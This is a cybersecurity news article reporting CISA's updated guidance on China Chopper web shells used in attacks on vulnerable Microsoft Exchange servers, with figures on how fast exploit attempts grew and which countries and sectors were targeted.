Dark Reading is part of the Informa Tech Division of Informa PLC

This site is operated by a business or businesses owned by Informa PLC and all copyright resides with them.Informa PLC's registered office is 5 Howick Place, London SW1P 1WG. Registered in England and Wales. Number 8860726.

Threat Intelligence

3/15/2021
04:20 PM
Connect Directly
Twitter
LinkedIn
RSS
E-Mail
50%
50%

CISA Updates Microsoft Exchange Advisory to Include China Chopper

US officials warn organizations of China Chopper Web shells as new data sheds light on how the Exchange Server exploits have grown.

US government officials have updated their guidance on the Microsoft Exchange Server flaws to include seven China Chopper Web shells linked to successful attacks against vulnerable servers.

Related Content:

Microsoft Exchange Server Attacks: 9 Lessons for Defenders

Special Report: How IT Security Organizations Are Attacking the Cybersecurity Problem

New From The Edge: Contemplating the Coffee Supply Chain: A Horror Story

The Department of Homeland Security's Cybersecurity & Infrastructure Security Agency (CISA) has provided ongoing updates to its Mitigate Microsoft Exchange Server Vulnerabilities webpage since Microsoft released out-of-band security updates for four Exchange Server flaws on March 2. In the following weeks, attackers have begun to scan for and exploit the bugs in target organizations around the world.

On March 13, CISA updated its guidance to provide seven Malware Analysis Reports (MARs), each of which identifies a China Chopper Web shell associated with vulnerability exploitation in Microsoft Exchange Servers. After an attacker successfully exploits a target server to gain initial access in these intrusions, they typically upload a Web shell to enable remote administration.

Web shells serve several purposes in cyberattacks. Beyond achieving remote admin, attackers can use these to exfiltrate sensitive data and credentials or upload additional malware to further their activity on the network. Web shells can be used to issue commands to hosts inside the network without direct Internet access, or they can be used as command-and-control infrastructure — example, as a botnet or as support to compromise more external networks.

China Chopper is a Web shell widely observed in these ongoing attacks by Cynet, Palo Alto Networks' Unit 42, Red Canary, and other security companies watching the threat. It's a lightweight, one-line script that has been used by several attack groups in recent years.

Researchers with SecurityScorecard observed two types of China Chopper in these recent attacks, they explain in a blog post. The second, they say, seems to indicate an evolution in the attack techniques — perhaps to ensure the file name isn't exposed in the Offline Address Book (OAB) file, to let attackers upload multiple files, or to let them randomly create a file name.

"The fact that China Chopper is a tool used by certain [advanced persistent threat] groups and the fact that China Chopper was specifically used to attack the vulnerable Microsoft services leads us to believe that additional APT groups are targeting these vulnerabilities," Cynet researchers report. It has become clear that several groups are exploiting these flaws, some before a patch was released.

CISA and some private firms tracking the attacks note that China Chopper is not the only Web shell in use. SecurityScorecard found other Web shell code designed to check if security tools from FireEye, CrowdStrike, and Carbon Black were present on a network, a sign that attackers may be collecting intelligence to learn about target environments and attempt to deploy more malware.

In addition to the MARs published over the weekend, CISA has also added information on the ransomware activity tied to the exploitation of vulnerable Exchange servers. Microsoft last week said it's tracking a form of ransomware called DearCry targeting compromised servers.

Attacks Grow Tenfold, Researchers Report
As analysts continue to track and report on these attacks, a larger picture has emerged of where these flaws are being exploited and how fast the activity is growing. Check Point Research has observed the number of attempted attacks quickly grow from 700 on March 11, 2021, to more than 7,200 on March 15.

The most heavily targeted country is the United States, which accounts for 17% of all exploit attempts, followed by Germany (6%), the United Kingdom (5%), the Netherlands (5%), and Russia (4%). Government and military is the most targeted sector, at 23% of all attempts, followed by manufacturing (15%), banking and financial services (14%), software vendors (7%), and healthcare (6%).

It remains unclear just how many organizations have been targeted with these exploits. ESET researchers have detected Web shells on more than 5,000 email servers as of March 10; so far, high-profile victims include the Norwegian Parliament and the European Banking Authority. Some reports indicate as many as 30,000 organizations in the US could potentially be affected.

Patching is underway, but vulnerable businesses still have work to do. In an update published March 12, Microsoft reported about 82,000 Exchange servers need to be updated. This marks a significant drop from its count of more than 100,000 vulnerable servers on March 9.

Kelly Sheridan is the Staff Editor at Dark Reading, where she focuses on cybersecurity news and analysis. She is a business technology journalist who previously reported for InformationWeek, where she covered Microsoft, and Insurance & Technology, where she covered financial ... View Full Bio
 

Recommended Reading:

Comment  | 
Print  | 
More Insights
Comments
Newest First  |  Oldest First  |  Threaded View
Commentary
Cyberattacks Are Tailored to Employees ... Why Isn't Security Training?
Tim Sadler, CEO and co-founder of Tessian,  6/17/2021
Edge-DRsplash-10-edge-articles
7 Powerful Cybersecurity Skills the Energy Sector Needs Most
Pam Baker, Contributing Writer,  6/22/2021
News
Microsoft Disrupts Large-Scale BEC Campaign Across Web Services
Kelly Sheridan, Staff Editor, Dark Reading,  6/15/2021
Register for Dark Reading Newsletters
White Papers
Video
Cartoon
Current Issue
The State of Cybersecurity Incident Response
In this report learn how enterprises are building their incident response teams and processes, how they research potential compromises, how they respond to new breaches, and what tools and processes they use to remediate problems and improve their cyber defenses for the future.
Flash Poll
How Enterprises are Developing Secure Applications
How Enterprises are Developing Secure Applications
Recent breaches of third-party apps are driving many organizations to think harder about the security of their off-the-shelf software as they continue to move left in secure software development practices.
Twitter Feed
Dark Reading - Bug Report
Bug Report
Enterprise Vulnerabilities
From DHS/US-CERT's National Vulnerability Database
CVE-2021-35210
PUBLISHED: 2021-06-23
Contao 4.5.x through 4.9.x before 4.9.16, and 4.10.x through 4.11.x before 4.11.5, allows XSS. It is possible to inject code into the tl_log table that will be executed in the browser when the system log is called in the back end.
CVE-2021-27649
PUBLISHED: 2021-06-23
Use after free vulnerability in file transfer protocol component in Synology DiskStation Manager (DSM) before 6.2.3-25426-3 allows remote attackers to execute arbitrary code via unspecified vectors.
CVE-2021-29084
PUBLISHED: 2021-06-23
Improper neutralization of special elements in output used by a downstream component ('Injection') vulnerability in Security Advisor report management component in Synology DiskStation Manager (DSM) before 6.2.3-25426-3 allows remote attackers to read arbitrary files via unspecified vectors.
CVE-2021-29085
PUBLISHED: 2021-06-23
Improper neutralization of special elements in output used by a downstream component ('Injection') vulnerability in file sharing management component in Synology DiskStation Manager (DSM) before 6.2.3-25426-3 allows remote attackers to read arbitrary files via unspecified vectors.
CVE-2021-29086
PUBLISHED: 2021-06-23
Exposure of sensitive information to an unauthorized actor vulnerability in webapi component in Synology DiskStation Manager (DSM) before 6.2.3-25426-3 allows remote attackers to obtain sensitive information via unspecified vectors.